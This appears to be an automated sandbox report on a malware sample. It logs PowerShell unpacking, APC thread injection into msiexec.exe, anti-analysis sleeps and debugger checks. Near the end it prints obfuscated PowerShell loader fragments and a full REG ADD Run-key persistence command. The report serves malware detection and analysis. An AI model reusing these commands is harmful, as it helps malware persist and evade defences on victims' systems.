Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior

Source: C:\Users\user\Desktop\x295IO8kqM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Found suspicious powershell code related to unpacking or dynamic code loading

Source: x295IO8kqM.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Lovinitiativer $Ortolan $standerwort), (Cellar @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Axone = [AppDomain]::CurrentDomain.GetAssemblies()$global:Pj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Drysning)), $gteskabskontoret).DefineDynamicModule($Straamndenes, $false).DefineType($Rehumanises, $Stomatomycosis, [System.MulticastD

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Feries			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Feries			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\x295IO8kqM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9911

Source: C:\Windows\SysWOW64\msiexec.exe TID: 904	Thread sleep count: 284 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 904	Thread sleep time: -142000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1260	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1260	Thread sleep count: 9486 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1260	Thread sleep time: -28458000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_0040635D FindFirstFileW,FindClose,	0_2_0040635D
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040580B
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000828000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.000000000082B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\x295IO8kqM.exe

API call chain: ExitProcess graph end node

graph_0-3522

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Early bird code injection technique detected

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3BD0000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"	Jump to behavior
